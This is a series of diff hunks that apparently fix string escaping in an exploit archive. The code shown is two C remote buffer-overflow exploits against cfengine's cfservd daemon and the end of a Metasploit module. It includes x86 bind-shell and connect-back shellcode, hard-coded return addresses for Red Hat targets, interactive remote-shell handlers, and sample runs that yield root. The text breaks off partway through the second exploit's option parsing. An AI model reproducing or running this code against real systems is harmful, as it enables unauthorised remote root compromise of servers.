"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
|
||||
pattern
|
||||
|
||||
# puts \"press any key\"; $stdin.gets
|
||||
# puts "press any key"; $stdin.gets
|
||||
|
||||
sock.put(trans)
|
||||
handler
|
||||
|
@ -134,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
rescue EOFError
|
||||
rescue => e
|
||||
print_error(\"#{e}\")
|
||||
print_error("#{e}")
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -4,7 +4,7 @@ cfengine is prone to a stack-based buffer overrun vulnerability. This issue may
|
|||
|
||||
The vulnerability may be exploited to execute arbitrary code with the privileges of cfservd. A denial of service may also be the result of exploitation attempts as cfservd is multi-threaded and may not be configured to restart itself via a super-server such as inetd.
|
||||
|
||||
/*********************************************************************************\\
|
||||
/*********************************************************************************\
|
||||
|
||||
* jsk / cfengine2-2.0.3 from redhat
|
||||
|
||||
|
@ -16,7 +16,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
|
|||
|
||||
* DSR-cfengine.pl :) i think it has some bugs.maybe it is only public
|
||||
* version...... possbile another reasns.....
|
||||
* the begin buf of exploit could be like \"111111\". so....DSR...
|
||||
* the begin buf of exploit could be like "111111". so....DSR...
|
||||
* by jsk from Ph4nt0m Security Team
|
||||
|
||||
* jsk@ph4nt0m.net chat with us ( irc.0x557.org #ph4nt0m)
|
||||
|
@ -50,7 +50,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
|
|||
|
||||
|
||||
|
||||
\\*********************************************************************************/
|
||||
\*********************************************************************************/
|
||||
|
||||
|
||||
|
||||
|
@ -72,7 +72,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
|
|||
|
||||
#define D_PORT 5803
|
||||
|
||||
#define D_HOST \"www.ph4nt0m.net\"
|
||||
#define D_HOST "www.ph4nt0m.net"
|
||||
|
||||
#define TIMEOUT 10
|
||||
|
||||
|
@ -80,18 +80,18 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
|
|||
|
||||
char shell[]= /* bindshell(26112)&, netric. */
|
||||
|
||||
\"\\x90\\x90\\x90\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\"
|
||||
\"\\x6a\\x02\\x89\\xe1\\xb0\\x66\\x52\"
|
||||
\"\\x50\\xcd\\x80\\x43\\x66\\x53\\x89\"
|
||||
\"\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\"
|
||||
\"\\x52\\x50\\xb0\\x66\\xcd\\x80\\x89\"
|
||||
\"\\xe1\\xb3\\x04\\xb0\\x66\\xcd\\x80\"
|
||||
\"\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\"
|
||||
\"\\x93\\xb0\\x3f\\xcd\\x80\\x49\\x79\"
|
||||
\"\\xf9\\x52\\x68\\x6e\\x2f\\x73\\x68\"
|
||||
\"\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\"
|
||||
\"\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\"
|
||||
\"\\x80\";
|
||||
"\x90\x90\x90\x31\xdb\xf7\xe3\x53\x43\x53"
|
||||
"\x6a\x02\x89\xe1\xb0\x66\x52"
|
||||
"\x50\xcd\x80\x43\x66\x53\x89"
|
||||
"\xe1\x6a\x10\x51\x50\x89\xe1"
|
||||
"\x52\x50\xb0\x66\xcd\x80\x89"
|
||||
"\xe1\xb3\x04\xb0\x66\xcd\x80"
|
||||
"\x43\xb0\x66\xcd\x80\x89\xd9"
|
||||
"\x93\xb0\x3f\xcd\x80\x49\x79"
|
||||
"\xf9\x52\x68\x6e\x2f\x73\x68"
|
||||
"\x68\x2f\x2f\x62\x69\x89\xe3"
|
||||
"\x52\x53\x89\xe1\xb0\x0b\xcd"
|
||||
"\x80";
|
||||
struct op_plat_st
|
||||
|
||||
{
|
||||
|
@ -112,15 +112,15 @@ struct op_plat_st __pl_form[]=
|
|||
|
||||
|
||||
|
||||
{0,\"red 8.0\",0x4029cc2c,0},
|
||||
{0,"red 8.0",0x4029cc2c,0},
|
||||
|
||||
{1,\"red 9.0(cmp)\",0x4029cda0,0},
|
||||
{1,"red 9.0(cmp)",0x4029cda0,0},
|
||||
|
||||
|
||||
|
||||
{2,\"red 7.2 (Compile)\",0x44444444,0},
|
||||
{2,"red 7.2 (Compile)",0x44444444,0},
|
||||
|
||||
{3,\"red 7.3 (Compile)\",0x44444444,0},
|
||||
{3,"red 7.3 (Compile)",0x44444444,0},
|
||||
|
||||
NULL
|
||||
|
||||
|
@ -136,17 +136,17 @@ void getshell(char *,unsigned short);
|
|||
|
||||
void printe(char *,short);
|
||||
|
||||
void sig_alarm(){printe(\"alarm/timeout hit.\",1);}
|
||||
void sig_alarm(){printe("alarm/timeout hit.",1);}
|
||||
|
||||
void banrl()
|
||||
|
||||
{
|
||||
|
||||
fprintf(stdout,\"\\n cfengine2-2.0.3:server remote buffer overflow exploit)\\n\");
|
||||
fprintf(stdout,"\n cfengine2-2.0.3:server remote buffer overflow exploit)\n");
|
||||
|
||||
fprintf(stdout,\" by jsk.\\n\");
|
||||
fprintf(stdout," by jsk.\n");
|
||||
|
||||
fprintf(stdout,\" Greets Br-00t and all #ph4nt0m .\\n\");
|
||||
fprintf(stdout," Greets Br-00t and all #ph4nt0m .\n");
|
||||
|
||||
}
|
||||
|
||||
|
@ -158,17 +158,17 @@ void x_fp_rm_usage(char *x_fp_rm)
|
|||
|
||||
int __t_xmp=0;
|
||||
|
||||
fprintf(stdout,\"\\n Usage: %s -[option] [arguments]\\n\\n\",x_fp_rm);
|
||||
fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm);
|
||||
|
||||
fprintf(stdout,\"\\t -h [hostname] - target host.\\n\");
|
||||
fprintf(stdout,"\t -h [hostname] - target host.\n");
|
||||
|
||||
fprintf(stdout,\"\\t -p [port] - port number.\\n\");
|
||||
fprintf(stdout,"\t -p [port] - port number.\n");
|
||||
|
||||
fprintf(stdout,\"\\t -s [addr] - &shellcode address.\\n\\n\");
|
||||
fprintf(stdout,"\t -s [addr] - &shellcode address.\n\n");
|
||||
|
||||
fprintf(stdout,\" Example> %s -h target_hostname -p 8000 -t num\\n\",x_fp_rm);
|
||||
fprintf(stdout," Example> %s -h target_hostname -p 8000 -t num\n",x_fp_rm);
|
||||
|
||||
fprintf(stdout,\" Select target number>\\n\\n\");
|
||||
fprintf(stdout," Select target number>\n\n");
|
||||
|
||||
for(;;)
|
||||
|
||||
|
@ -182,7 +182,7 @@ else
|
|||
|
||||
{
|
||||
|
||||
fprintf(stdout,\"\\t {%d} %s\\n\",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);
|
||||
fprintf(stdout,"\t {%d} %s\n",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);
|
||||
|
||||
}
|
||||
|
||||
|
@ -190,7 +190,7 @@ __t_xmp++;
|
|||
|
||||
}
|
||||
|
||||
fprintf(stdout,\"\\n\");
|
||||
fprintf(stdout,"\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -218,7 +218,7 @@ u_long retaddr=__pl_form[type].retaddr;
|
|||
|
||||
(void)banrl();
|
||||
|
||||
while((whlp=getopt(argc,argv,\"T:t:H:h:P:p:IiXx\"))!=EOF)
|
||||
while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF)
|
||||
|
||||
{
|
||||
|
||||
|
@ -228,9 +228,9 @@ switch(whlp)
|
|||
|
||||
{
|
||||
|
||||
case \'T\':
|
||||
case 'T':
|
||||
|
||||
case \'t\':
|
||||
case 't':
|
||||
|
||||
if((type=atoi(optarg))<6)
|
||||
|
||||
|
@ -248,9 +248,9 @@ break;
|
|||
|
||||
|
||||
|
||||
case \'H\':
|
||||
case 'H':
|
||||
|
||||
case \'h\':
|
||||
case 'h':
|
||||
|
||||
memset((char *)hostname,0,sizeof(hostname));
|
||||
|
||||
|
@ -260,9 +260,9 @@ break;
|
|||
|
||||
|
||||
|
||||
case \'P\':
|
||||
case 'P':
|
||||
|
||||
case \'p\':
|
||||
case 'p':
|
||||
|
||||
port=atoi(optarg);
|
||||
|
||||
|
@ -270,17 +270,17 @@ break;
|
|||
|
||||
|
||||
|
||||
case \'I\':
|
||||
case 'I':
|
||||
|
||||
case \'i\':
|
||||
case 'i':
|
||||
|
||||
fprintf(stderr,\" Try `%s -?\' for more information.\\n\\n\",argv[0]);
|
||||
fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
|
||||
|
||||
exit(-1);
|
||||
|
||||
|
||||
|
||||
case \'?\':
|
||||
case '?':
|
||||
|
||||
(void)x_fp_rm_usage(argv[0]);
|
||||
|
||||
|
@ -302,35 +302,35 @@ if(!strcmp(hostname,D_HOST))
|
|||
|
||||
{
|
||||
|
||||
fprintf(stdout,\" [+] Hostname: %s\\n\",hostname);
|
||||
fprintf(stdout," [+] Hostname: %s\n",hostname);
|
||||
|
||||
fprintf(stdout,\" [+] Port num: %d\\n\",port);
|
||||
fprintf(stdout," [+] Port num: %d\n",port);
|
||||
|
||||
fprintf(stdout,\" [+] Retaddr address: %p\\n\",retaddr);
|
||||
fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
fprintf(stdout,\" [1] #1 Set codes.\\n\");
|
||||
fprintf(stdout," [1] #1 Set codes.\n");
|
||||
|
||||
|
||||
|
||||
if(!(buf=(char *)malloc(BUFSIZE+1)))
|
||||
|
||||
printe(\"getcode(): allocating memory failed.\",1);
|
||||
printe("getcode(): allocating memory failed.",1);
|
||||
|
||||
|
||||
|
||||
memset(buf, 0x90, BUFSIZE);
|
||||
|
||||
buf[0] = \'1\';
|
||||
buf[1] = \'1\';
|
||||
buf[2] = \'1\';
|
||||
buf[3] = \'1\';
|
||||
buf[4] = \'1\';
|
||||
buf[5] = \'1\';
|
||||
buf[6] = \'1\';
|
||||
buf[0] = '1';
|
||||
buf[1] = '1';
|
||||
buf[2] = '1';
|
||||
buf[3] = '1';
|
||||
buf[4] = '1';
|
||||
buf[5] = '1';
|
||||
buf[6] = '1';
|
||||
|
||||
memset(buf+7,0x90,636);
|
||||
|
||||
|
@ -354,17 +354,17 @@ fprintf(stdout,\" [1] #1 Set codes.\\n\");
|
|||
|
||||
memcpy(&buf[BUFSIZE-(9*sizeof(retaddr))], &retaddr, sizeof(retaddr));
|
||||
|
||||
fprintf(stdout,\" [1] #1 Set socket.\\n\");
|
||||
fprintf(stdout," [1] #1 Set socket.\n");
|
||||
|
||||
sd=sock_connect(hostname,port);
|
||||
|
||||
fprintf(stdout,\" [1] #1 Send codes.\\n\");
|
||||
fprintf(stdout," [1] #1 Send codes.\n");
|
||||
|
||||
write(sd,buf,BUFSIZE);
|
||||
|
||||
close(sd);
|
||||
sleep(1);
|
||||
fprintf(stdout,\" [1] #3 Get shell.\\n\");
|
||||
fprintf(stdout," [1] #3 Get shell.\n");
|
||||
getshell(hostname,26112);
|
||||
exit(0);
|
||||
|
||||
|
@ -386,13 +386,13 @@ unsigned short port){
|
|||
|
||||
s.sin_port=htons(port);
|
||||
|
||||
printf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port);
|
||||
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
|
||||
|
||||
if((s.sin_addr.s_addr=inet_addr(hostname))){
|
||||
|
||||
if(!(t=gethostbyname(hostname)))
|
||||
|
||||
printe(\"couldn\'t resolve hostname.\",1);
|
||||
printe("couldn't resolve hostname.",1);
|
||||
|
||||
memcpy((char*)&s.sin_addr,(char*)t->h_addr,
|
||||
|
||||
|
@ -406,11 +406,11 @@ unsigned short port){
|
|||
|
||||
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
|
||||
|
||||
printe(\"netris connection failed.\",1);
|
||||
printe("netris connection failed.",1);
|
||||
|
||||
alarm(0);
|
||||
|
||||
printf(\"[*] successfully connected: %s:%d.\\n\",hostname,port);
|
||||
printf("[*] successfully connected: %s:%d.\n",hostname,port);
|
||||
|
||||
return(sock);
|
||||
|
||||
|
@ -428,11 +428,11 @@ void getshell(char *hostname,unsigned short port){
|
|||
|
||||
struct sockaddr_in sa;
|
||||
|
||||
printf(\"[*] checking to see if the exploit was successful.\\n\");
|
||||
printf("[*] checking to see if the exploit was successful.\n");
|
||||
|
||||
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
|
||||
|
||||
printe(\"getshell(): socket() failed.\",1);
|
||||
printe("getshell(): socket() failed.",1);
|
||||
|
||||
sa.sin_family=AF_INET;
|
||||
|
||||
|
@ -440,7 +440,7 @@ void getshell(char *hostname,unsigned short port){
|
|||
|
||||
if(!(he=gethostbyname(hostname)))
|
||||
|
||||
printe(\"getshell(): couldn\'t resolve.\",1);
|
||||
printe("getshell(): couldn't resolve.",1);
|
||||
|
||||
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
|
||||
|
||||
|
@ -454,11 +454,11 @@ void getshell(char *hostname,unsigned short port){
|
|||
|
||||
alarm(TIMEOUT);
|
||||
|
||||
printf(\"[*] attempting to connect: %s:%d.\\n\",hostname,port);
|
||||
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
|
||||
|
||||
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
|
||||
|
||||
printf(\"[!] connection failed: %s:%d.\\n\",hostname,port);
|
||||
printf("[!] connection failed: %s:%d.\n",hostname,port);
|
||||
|
||||
return;
|
||||
|
||||
|
@ -466,11 +466,11 @@ void getshell(char *hostname,unsigned short port){
|
|||
|
||||
alarm(0);
|
||||
|
||||
printf(\"[*] successfully connected: %s:%d.\\n\\n\",hostname,port);
|
||||
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
|
||||
|
||||
signal(SIGINT,SIG_IGN);
|
||||
|
||||
write(sock,\"uname -a;id\\n\",13);
|
||||
write(sock,"uname -a;id\n",13);
|
||||
|
||||
while(1){
|
||||
|
||||
|
@ -482,17 +482,17 @@ void getshell(char *hostname,unsigned short port){
|
|||
|
||||
if(select(sock+1,&fds,0,0,0)<1)
|
||||
|
||||
printe(\"getshell(): select() failed.\",1);
|
||||
printe("getshell(): select() failed.",1);
|
||||
|
||||
if(FD_ISSET(0,&fds)){
|
||||
|
||||
if((r=read(0,buf,4096))<1)
|
||||
|
||||
printe(\"getshell(): read() failed.\",1);
|
||||
printe("getshell(): read() failed.",1);
|
||||
|
||||
if(write(sock,buf,r)!=r)
|
||||
|
||||
printe(\"getshell(): write() failed.\",1);
|
||||
printe("getshell(): write() failed.",1);
|
||||
|
||||
}
|
||||
|
||||
|
@ -516,9 +516,9 @@ void getshell(char *hostname,unsigned short port){
|
|||
|
||||
void printe(char *err,short e){
|
||||
|
||||
fprintf(stdout,\" [-] Failed.\\n\\n\");
|
||||
fprintf(stdout," [-] Failed.\n\n");
|
||||
|
||||
fprintf(stdout,\" Happy Exploit ! :-)\\n\\n\");
|
||||
fprintf(stdout," Happy Exploit ! :-)\n\n");
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -10,11 +10,11 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
|
|||
* Date: 4 November 2003 *
|
||||
* *
|
||||
* Yet another version.. no big deal.. nothing special.. *
|
||||
* just an extra built-in support for \'connect-back\' shell.. *
|
||||
* so that I dun need \'nc -l -p 31337\' stuffs... duh !?! *
|
||||
* just an extra built-in support for 'connect-back' shell.. *
|
||||
* so that I dun need 'nc -l -p 31337' stuffs... duh !?! *
|
||||
* *
|
||||
* Anyway.. credit should go to Nick Cleaton who disovered *
|
||||
* this nice little \'bug\'... ;) *
|
||||
* this nice little 'bug'... ;) *
|
||||
* *
|
||||
* As usual, use it at your very own risk... *
|
||||
* But then again, I really doubt this code will work for you *
|
||||
|
@ -48,11 +48,11 @@ Transaction Receive [88888][]
|
|||
RecvSocketStream(8888)
|
||||
(Concatenated 4192 from stream)
|
||||
Transmission empty...
|
||||
Received: [\'\\x90\'......1???QQQ?f????PPfha,fS?SRQ???1??
|
||||
Received: ['\x90'......1???QQQ?f????PPfha,fS?SRQ???1??
|
||||
1??1?R?f?????0?1??PW?f?????9?@1 ?1????1???
|
||||
1???1?h//shh/bin?PS??1??1 ?? on socket -1869574000
|
||||
Transaction Send[t 20][Packed text]
|
||||
cfservd: Couldn\'t send
|
||||
cfservd: Couldn't send
|
||||
cfservd: send
|
||||
cfservd: Closing connection
|
||||
|
||||
|
@ -68,7 +68,7 @@ Cfservd Remote Exploit by snooq [ jinyean@hotmail.com ]
|
|||
Tested to work against cfservd 2.0.7 on Redhat 8.0
|
||||
|
||||
-> Using return address of 0x4029eeff
|
||||
-> \'Connecting\' mode...
|
||||
-> 'Connecting' mode...
|
||||
-> Exploit string sent. Waiting for a shell...
|
||||
-> Connecting to shell at 192.168.1.1:24876
|
||||
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),
|
||||
|
@ -89,7 +89,7 @@ Cfservd Remote Exploit by snooq [ jinyean@hotmail.com ]
|
|||
Tested to work against cfservd 2.0.7 on Redhat 8.0
|
||||
|
||||
-> Using return address of 0x4029eeff
|
||||
-> \'Listening\' mode...( port: 24876 )
|
||||
-> 'Listening' mode...( port: 24876 )
|
||||
-> Exploit string sent....
|
||||
-> Waiting for connection....
|
||||
-> Connection from: 192.168.1.1
|
||||
|
@ -132,61 +132,61 @@ exit
|
|||
#define SC_SIZE_1 sizeof(bindport)
|
||||
#define SC_SIZE_2 sizeof(connback)
|
||||
|
||||
#define CMD \"/usr/bin/id\\n\"
|
||||
#define CMD "/usr/bin/id\n"
|
||||
|
||||
/*
|
||||
* Shellcode were shamelessly ripped from netric\'s code... =p
|
||||
* Shellcode were shamelessly ripped from netric's code... =p
|
||||
*/
|
||||
|
||||
char bindport[]=
|
||||
\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\"
|
||||
\"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"
|
||||
\"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\"
|
||||
\"\\x89\\xc1\\x31\\xc0\\x31\\xdb\\x50\\x50\"
|
||||
\"\\x50\\x66\\x68\\x61\\x2c\\xb3\\x02\\x66\"
|
||||
\"\\x53\\x89\\xe2\\xb3\\x10\\x53\\xb3\\x02\"
|
||||
\"\\x52\\x51\\x89\\xca\\x89\\xe1\\xb0\\x66\"
|
||||
\"\\xcd\\x80\\x31\\xdb\\x39\\xc3\\x74\\x05\"
|
||||
\"\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\\x50\"
|
||||
\"\\x52\\x89\\xe1\\xb3\\x04\\xb0\\x66\\xcd\"
|
||||
\"\\x80\\x89\\xd7\\x31\\xc0\\x31\\xdb\\x31\"
|
||||
\"\\xc9\\xb3\\x11\\xb1\\x01\\xb0\\x30\\xcd\"
|
||||
\"\\x80\\x31\\xc0\\x31\\xdb\\x50\\x50\\x57\"
|
||||
\"\\x89\\xe1\\xb3\\x05\\xb0\\x66\\xcd\\x80\"
|
||||
\"\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\"
|
||||
\"\\xcd\\x80\\x39\\xc3\\x75\\x40\\x31\\xc0\"
|
||||
\"\\x89\\xfb\\xb0\\x06\\xcd\\x80\\x31\\xc0\"
|
||||
\"\\x31\\xc9\\x89\\xf3\\xb0\\x3f\\xcd\\x80\"
|
||||
\"\\x31\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\"
|
||||
\"\\xc0\\x41\\xb0\\x3f\\xcd\\x80\\x31\\xc0\"
|
||||
\"\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\"
|
||||
\"\\x62\\x69\\x6e\\x89\\xe3\\x8b\\x54\\x24\"
|
||||
\"\\x08\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\"
|
||||
\"\\x80\\x31\\xc0\\x40\\xcd\\x80\\x31\\xc0\"
|
||||
\"\\x89\\xf3\\xb0\\x06\\xcd\\x80\\xeb\\x99\";
|
||||
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
|
||||
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
|
||||
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
|
||||
"\x89\xc1\x31\xc0\x31\xdb\x50\x50"
|
||||
"\x50\x66\x68\x61\x2c\xb3\x02\x66"
|
||||
"\x53\x89\xe2\xb3\x10\x53\xb3\x02"
|
||||
"\x52\x51\x89\xca\x89\xe1\xb0\x66"
|
||||
"\xcd\x80\x31\xdb\x39\xc3\x74\x05"
|
||||
"\x31\xc0\x40\xcd\x80\x31\xc0\x50"
|
||||
"\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
|
||||
"\x80\x89\xd7\x31\xc0\x31\xdb\x31"
|
||||
"\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
|
||||
"\x80\x31\xc0\x31\xdb\x50\x50\x57"
|
||||
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
|
||||
"\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
|
||||
"\xcd\x80\x39\xc3\x75\x40\x31\xc0"
|
||||
"\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
|
||||
"\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
|
||||
"\x31\xc0\x41\xb0\x3f\xcd\x80\x31"
|
||||
"\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
|
||||
"\x50\x68\x2f\x2f\x73\x68\x68\x2f"
|
||||
"\x62\x69\x6e\x89\xe3\x8b\x54\x24"
|
||||
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
|
||||
"\x80\x31\xc0\x40\xcd\x80\x31\xc0"
|
||||
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
|
||||
|
||||
char connback[]=
|
||||
\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\"
|
||||
\"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"
|
||||
\"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\"
|
||||
\"\\x89\\xc2\\x31\\xc0\\x31\\xc9\\x51\\x51\"
|
||||
\"\\x68\\x41\\x42\\x43\\x44\\x66\\x68\\xb0\"
|
||||
\"\\xef\\xb1\\x02\\x66\\x51\\x89\\xe7\\xb3\"
|
||||
\"\\x10\\x53\\x57\\x52\\x89\\xe1\\xb3\\x03\"
|
||||
\"\\xb0\\x66\\xcd\\x80\\x31\\xc9\\x39\\xc1\"
|
||||
\"\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\"
|
||||
\"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xcd\\x80\"
|
||||
\"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\\x01\"
|
||||
\"\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\"
|
||||
\"\\xb1\\x02\\xcd\\x80\\x31\\xc0\\x31\\xd2\"
|
||||
\"\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\"
|
||||
\"\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\"
|
||||
\"\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\"
|
||||
\"\\x01\\xcd\\x80\";
|
||||
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
|
||||
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
|
||||
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
|
||||
"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
|
||||
"\x68\x41\x42\x43\x44\x66\x68\xb0"
|
||||
"\xef\xb1\x02\x66\x51\x89\xe7\xb3"
|
||||
"\x10\x53\x57\x52\x89\xe1\xb3\x03"
|
||||
"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
|
||||
"\x74\x06\x31\xc0\xb0\x01\xcd\x80"
|
||||
"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
|
||||
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
|
||||
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
|
||||
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
|
||||
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
|
||||
"\x2f\x62\x69\x89\xe3\x50\x53\x89"
|
||||
"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
|
||||
"\x01\xcd\x80";
|
||||
|
||||
/*
|
||||
* Ugly select() stuffs....
|
||||
* Modified (a little) from TESO\'s code..
|
||||
* Modified (a little) from TESO's code..
|
||||
* to support connect back shell.... ;)
|
||||
*/
|
||||
|
||||
|
@ -206,7 +206,7 @@ void doshell(int sock) {
|
|||
if (FD_ISSET (0, &rfds)) {
|
||||
l = read (0, buf, sizeof (buf));
|
||||
if (l <= 0) {
|
||||
fprintf(stdout,\"-> Connection closed by local user\\n\");
|
||||
fprintf(stdout,"-> Connection closed by local user\n");
|
||||
exit (EXIT_FAILURE);
|
||||
}
|
||||
sent=0;
|
||||
|
@ -222,10 +222,10 @@ void doshell(int sock) {
|
|||
if (FD_ISSET (sock, &rfds)) {
|
||||
l = read (sock, buf, sizeof (buf));
|
||||
if (l == 0) {
|
||||
fprintf(stdout,\"-> Connection closed by remote host.\\n\");
|
||||
fprintf(stdout,"-> Connection closed by remote host.\n");
|
||||
exit (EXIT_FAILURE);
|
||||
} else if (l < 0) {
|
||||
fprintf(stdout,\"-> read() error\\n\");
|
||||
fprintf(stdout,"-> read() error\n");
|
||||
exit (EXIT_FAILURE);
|
||||
}
|
||||
write (1, buf, l);
|
||||
|
@ -255,38 +255,38 @@ void changeport(char *code, int port, int offset) {
|
|||
|
||||
void sendcmd(int sock) {
|
||||
if (send(sock,CMD,strlen(CMD),0)<0) {
|
||||
err_exit(\"-> send() error\");
|
||||
err_exit("-> send() error");
|
||||
}
|
||||
}
|
||||
|
||||
void usage(char *s) {
|
||||
fprintf(stdout,\"\\nUsage: %s [-options]\\n\\n\",s);
|
||||
fprintf(stdout,\"\\t-r\\tSize of \'return addresses\'\\n\");
|
||||
fprintf(stdout,\"\\t-b\\tThe overall size of the buffer\\n\");
|
||||
fprintf(stdout,\"\\t-a\\tAlignment size [0~3]\\n\");
|
||||
fprintf(stdout,\"\\t-t\\tTarget\'s port\\n\");
|
||||
fprintf(stdout,\"\\t-s\\tPort to bind shell to (in \'connecting\' mode), or\\n\");
|
||||
fprintf(stdout,\"\\t\\tPort for shell to connect back (in \'listening\' mode)\\n\");
|
||||
fprintf(stdout,\"\\t-o\\tOffset from the default return address\\n\");
|
||||
fprintf(stdout,\"\\t-h\\tTarget\'s IP\\n\");
|
||||
fprintf(stdout,\"\\t-l\\tListening for shell connecting\\n\");
|
||||
fprintf(stdout,\"\\t\\tback to port specified by \'-s\' switch\\n\");
|
||||
fprintf(stdout,\"\\t-i\\tIP for shell to connect back\\n\");
|
||||
fprintf(stdout,\"\\t-T\\tNumber of seconds to wait for connection\\n\\n\");
|
||||
fprintf(stdout,\"\\tNotes:\\n\\t======\\n\\t\'-h\' is mandatory\\n\");
|
||||
fprintf(stdout,\"\\t\'-i\' is mandatory if \'-l\' is specified\\n\\n\");
|
||||
fprintf(stdout,"\nUsage: %s [-options]\n\n",s);
|
||||
fprintf(stdout,"\t-r\tSize of 'return addresses'\n");
|
||||
fprintf(stdout,"\t-b\tThe overall size of the buffer\n");
|
||||
fprintf(stdout,"\t-a\tAlignment size [0~3]\n");
|
||||
fprintf(stdout,"\t-t\tTarget's port\n");
|
||||
fprintf(stdout,"\t-s\tPort to bind shell to (in 'connecting' mode), or\n");
|
||||
fprintf(stdout,"\t\tPort for shell to connect back (in 'listening' mode)\n");
|
||||
fprintf(stdout,"\t-o\tOffset from the default return address\n");
|
||||
fprintf(stdout,"\t-h\tTarget's IP\n");
|
||||
fprintf(stdout,"\t-l\tListening for shell connecting\n");
|
||||
fprintf(stdout,"\t\tback to port specified by '-s' switch\n");
|
||||
fprintf(stdout,"\t-i\tIP for shell to connect back\n");
|
||||
fprintf(stdout,"\t-T\tNumber of seconds to wait for connection\n\n");
|
||||
fprintf(stdout,"\tNotes:\n\t======\n\t'-h' is mandatory\n");
|
||||
fprintf(stdout,"\t'-i' is mandatory if '-l' is specified\n\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void sigalrm() {
|
||||
fprintf(stdout,\"-> Nope.. I ain\'t waiting any longer.. =p\\n\");
|
||||
fprintf(stdout,"-> Nope.. I ain't waiting any longer.. =p\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
|
||||
char opt;
|
||||
char *buf, *ptr, *ip=\"\";
|
||||
char *buf, *ptr, *ip="";
|
||||
struct sockaddr_in sockadd;
|
||||
int i, s1, s2, i_len, ok=0, mode=0;
|
||||
int time_out=TIME_OUT, scsize=SC_SIZE_1;
|
||||
|
@ -296,48 +296,48 @@ int main(int argc, char *argv[]) {
|
|||
|
||||
if (argc<2) { usage(argv[0]); }
|
||||
|
||||
while ((opt=getopt(argc,argv,\"i:r:b:a:h:t:s:o:T:l\"))!=EOF) {
|
||||
while ((opt=getopt(argc,argv,"i:r:b:a:h:t:s:o:T:l"))!=EOF) {
|
||||
switch(opt) {
|
||||
case \'i\':
|
||||
case 'i':
|
||||
ip=optarg;
|
||||
changeip(ip);
|
||||
break;
|
||||
|
||||
case \'l\':
|
||||
case 'l':
|
||||
mode=1;
|
||||
scsize=SC_SIZE_2;
|
||||
break;
|
||||
|
||||
case \'T\':
|
||||
case 'T':
|
||||
